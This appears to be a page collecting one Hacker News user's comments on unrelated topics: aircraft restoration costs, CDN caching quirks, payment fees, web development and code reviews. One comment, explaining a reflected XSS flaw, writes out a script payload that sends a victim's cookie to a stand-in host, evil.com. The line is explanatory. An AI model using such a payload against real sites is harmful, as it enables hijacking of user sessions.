"except for a few pop artists here"
HN user
blahpro
http://benhodgson.com/
I agree with the sentiment, but costs do impact revenue when those costs represent an investment in something that can be used to increase revenue, like employees.
Nothing compared to loss of life and suffering of the Ukrainian people of course, but: this is sad.
From the article: "It will cost over USD3 billion to restore the plane [...]".
This seems extremely high. I'd expect maybe high hundreds of millions. I appreciate that they're hardly like-for-like, but the A380 unit cost was something like $400M, which I think has maybe double the tonnage of the An-225. Where does the extra couple of billion come from?
Please consider adding instructions for reproducing the issue to this thread. E.g. what's the name of the business that's using your URL, and what's your URL? Without such instructions it's much harder for others on HN, or from Google, to help.
As far as I can tell, that GIF is showing Duo video quality before and after using a new codec design to improve quality particularly over low-bandwidth connections.
Nice! I think there's an error in the bottom-left of the footer, which says "Day of the Day", instead of "Day of the Dead"?
Just like any other email provider supporting POP3/IMAP.
Yeah but the image comes straight out of cache.
I like this bit: <img src="#" [...]>
Hmm. This article refers to the data centre as an "Apple Factory" and misspells Tim Cook's name.
Interesting article, but would greatly benefit from a "TL;DR" summary at the top.
I would argue that this could be counter-productive. 24/7 immersion in an employer-owned and operated environment doesn't sound healthy from a work/life balance perspective.
Yes. If you had an XSS vulnerability via a GET querystring parameter, an attacker could encourage a victim to visit a URL which exploited the vulnerability (or, say, iframed the URL in another page which they got the victim to visit), then the attacker could, say steal the user's auth cookie with something like <script>(new Image).src = "http://evil.com/stolencookie=" + document.cookie;</script>.
It'd be interesting to see an animation of the diamond/square iteration progressing in 3D, starting with a flat surface and ending with the finished terrain :)
"Airplane Mode" claims to use a Parrot AR Drone 2.0 (~$290) for parts. The controller used is actually an infrared one from a smaller and cheaper (~$20) RC helicopter, like this: http://www.amazon.com/Syma-S107-S107G-Helicopter-Colors/dp/8...
Molly's books were what really got me started with web development. She was kind enough to send me a signed copy of one of her books when I was probably ~13 years old after emailing her. About ten years later, I was able to meet up with her here in the UK for a coffee, which was lovely.
If you can, please support Molly's treatment with a donation. Thank you.
This is extremely laggy for me in Safari 7.
Pretty cool! Some feedback: lose the flashing instructional text.
This is what PayPal have charged for as long as I can remember. I always assumed that later entrants (Stripe etc) adopted that price point to be competitive with PayPal.
Zynga's market cap is listed as $2.9 million. Presumably this is a typo; it's ~$2.9 billion.
platform.twitter.com is currently CNAMEd to EdgeCast CDN. It looks like the CDN is sitting in front of Amazon S3; http://platform.twitter.com/blahblahblah gives an S3-like 403 response.
My guess: many CDNs allow you to exclude the querystring from the cache key, so it's possible that one person requested the URL with ?torrent in the querystring (which causes S3 to serve a .torrent response) and that the request hit a cold cache. The response with type application/x-bittorrent was then cached under the querystring-less cache key, causing it to be served to anyone else hitting that edge node with the path /widgets/tweet_button.html.
Again: this is just my guess.
Although they come from Microsoft, I don't feel enormously comfortable doing this:
chmod +x LinuxVirtualBox.part1.sfx; ./LinuxVirtualBox.part1.sfxNitpick++: Exceptional Cloud Services, Inc. is the legal entity. I’d say that "Exceptional" is a reasonable way to refer to the team.
Interesting. It might also be useful to see latencies between regions (or even availability zones).
This looks like a really useful tool, although the automatic importing of anything that smells like a module makes me a little uncomfortable:
modules = re.findall(r'([\w.]+)+(?=\.\w+)\b', all_text)
then later: for m in modules:
try:
key = m.split('.')[0]
self[key] = __import__(m)
except:
passI like it! I think the progress indicator in the title needs some rounding love, however:
document.title = (100 * time / totaltime).toFixed(1) + "%";You could achieve this entirely statelessly (i.e. without a database) by encoding the task name in the URL. This is the sort of feature that could fuel growth by encouraging sharing :)
I misread this as "meatballs". Needless to say, this was not what I was expecting ;-). I like the effect. I wonder what meta-metaballs would look like...
Maybe this is part of the test ;-)